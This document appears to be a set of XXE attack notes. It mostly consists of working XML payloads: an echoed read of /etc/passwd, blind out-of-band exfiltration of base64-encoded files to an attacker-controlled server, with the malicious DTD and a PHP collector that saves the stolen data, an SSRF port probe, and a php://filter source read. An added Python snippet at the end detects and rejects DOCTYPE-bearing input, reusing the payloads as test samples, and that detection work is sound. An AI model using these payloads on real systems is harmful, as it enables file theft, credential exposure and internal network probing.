1. XXE Introduction
[Knowledge primer] Let's talk about the XML file format today_xml file - CSDN blog
2. XXE payload
2.1. Echoed output: reading a file
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ANY [
<!ENTITY content SYSTEM "file:///etc/passwd">
<!--<!ENTITY content SYSTEM "file:///c://Windows//System32//test.txt">-->
]>
<x>&content;</x>
Requesting a file that does not exist makes the parser error reveal the current path.
The current path is therefore: C:\Software\phpstudy_pro\WWW\xxe-lab\php_xxe\
2.2. No output (blind): reading a file
2.2.1. Method 1
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=d:/test.txt">
<!ENTITY % dtd SYSTEM "http://192.168.30.130:8081/test.dtd">
%dtd;
%send;
]>
test.dtd
<!ENTITY % payload "<!ENTITY % send SYSTEM 'http://192.168.30.130:8081/?data=%file;'>">
%payload;
2.2.2. Method 2
Create 1.php on the attacker-controlled server:
<?php file_put_contents("1.txt", $_GET['file']); ?>
Create evil.xml on the attacker-controlled server:
<!ENTITY % payload "<!ENTITY % send SYSTEM 'http://192.168.163.130:8000/1.php?content=%file;'>"> %payload;
Start an HTTP server in the directory containing 1.php and evil.xml:
python -m http.server -b 192.168.163.130 8000
Capture the request in Burp Suite and change the body to:
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///C://windows//win.ini">
<!ENTITY % dtd SYSTEM "http://192.168.163.130:8000/evil.xml">
%dtd;
%send;
]>
2. SSRF: port probing
Works for both echoed and blind XXE; this also uses an external general entity:
<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY content SYSTEM "http://127.0.0.1:3306">]>
<name>&content;</name>
Whether the port is open is inferred from the response time.
3. If the target is PHP, the php://filter wrapper can read the file directly:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY>
<!ENTITY goodies SYSTEM "php://filter/read=convert.base64-encode/resource=index.php"> ]>
<creds>&goodies;</creds>
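As an added, defender-side example that is not part of these notes: every payload above depends on a DOCTYPE carrying an external entity (SYSTEM) and, for the blind variants, parameter entities (%name;). The check below flags those constructs in raw XML before parsing and refuses to parse any document that has a DOCTYPE at all; the sample documents are constructed from the note's payloads, and the reject-all-DOCTYPE policy assumes the application never needs inline DTDs.

```python
import re
import xml.etree.ElementTree as ET

# Patterns for the DTD features the payloads in these notes depend on.
# The check runs on decoded text, so a UTF-16 body must be decoded first.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
# <!ENTITY name SYSTEM "..."> or <!ENTITY % name SYSTEM "..."> (external general/parameter entity)
EXTERNAL_ENTITY_RE = re.compile(r"<!ENTITY\s+(?:%\s*)?[\w.-]+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE)
# Parameter entity declarations and %name; references (remote DTD load, out-of-band send)
PARAM_ENTITY_RE = re.compile(r"<!ENTITY\s+%|%[\w.-]+;")


def classify_xml(doc: str) -> dict:
    """Flag the risky DTD constructs in an XML document without parsing it."""
    return {
        "doctype": DOCTYPE_RE.search(doc) is not None,
        "external_entity": EXTERNAL_ENTITY_RE.search(doc) is not None,
        "parameter_entity": PARAM_ENTITY_RE.search(doc) is not None,
    }


def parse_untrusted(doc: str) -> ET.Element:
    """Reject any document carrying a DOCTYPE, then parse it.

    Untrusted input has no legitimate need for an inline DTD, so rejecting it
    outright (the same effect as disabling DTD/entity loading in the parser)
    is simpler and safer than trying to allow-list entity types.
    """
    if classify_xml(doc)["doctype"]:
        raise ValueError("DOCTYPE / entity declarations are not allowed in untrusted XML")
    return ET.fromstring(doc)


# Constructed samples: the note's echoed read, blind (out-of-band) read and SSRF probe,
# plus a benign document of the kind the application actually expects.
ECHOED_READ = ('<?xml version="1.0"?><!DOCTYPE ANY [<!ENTITY content SYSTEM "file:///etc/passwd">]>'
               '<x>&content;</x>')
BLIND_READ = ('<?xml version="1.0"?><!DOCTYPE test [\n'
              '<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=d:/test.txt">\n'
              '<!ENTITY % dtd SYSTEM "http://192.168.30.130:8081/test.dtd">\n%dtd;\n%send;\n]><x/>')
SSRF_PROBE = ('<?xml version="1.0"?><!DOCTYPE ANY [<!ENTITY content SYSTEM "http://127.0.0.1:3306">]>'
              '<name>&content;</name>')
BENIGN = '<?xml version="1.0"?><user><name>alice</name></user>'

if __name__ == "__main__":
    for label, doc in [("echoed", ECHOED_READ), ("blind", BLIND_READ), ("ssrf", SSRF_PROBE), ("benign", BENIGN)]:
        print(label, classify_xml(doc))
```

The same gate is worth logging as a detection signal: a DOCTYPE in a request body to an endpoint that never expects one is a strong indicator of an XXE attempt.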